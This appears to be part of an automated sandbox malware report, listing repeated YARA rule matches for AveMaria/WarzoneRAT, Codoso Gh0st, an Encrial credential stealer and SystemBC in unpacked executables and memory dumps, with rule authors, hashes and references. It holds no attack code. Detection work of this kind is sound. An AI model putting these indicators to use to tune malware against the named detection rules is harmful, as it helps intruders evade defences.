Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d5d69a.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea8a38.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 18.2.glonkjhg.exe.3d5d69a.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.e95278.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea6d50.6.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 19.0.AddInProcess32.exe.900000.0.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.ea71c8.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 18.2.glonkjhg.exe.3ca925a.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 20.3.AddInProcess32.exe.e95278.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.inquiry.pdf.exe.3c6b362.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000013.00000000.404261855.0000000000A54000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.486255631.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 00000014.00000003.485919583.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000014.00000003.486150119.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
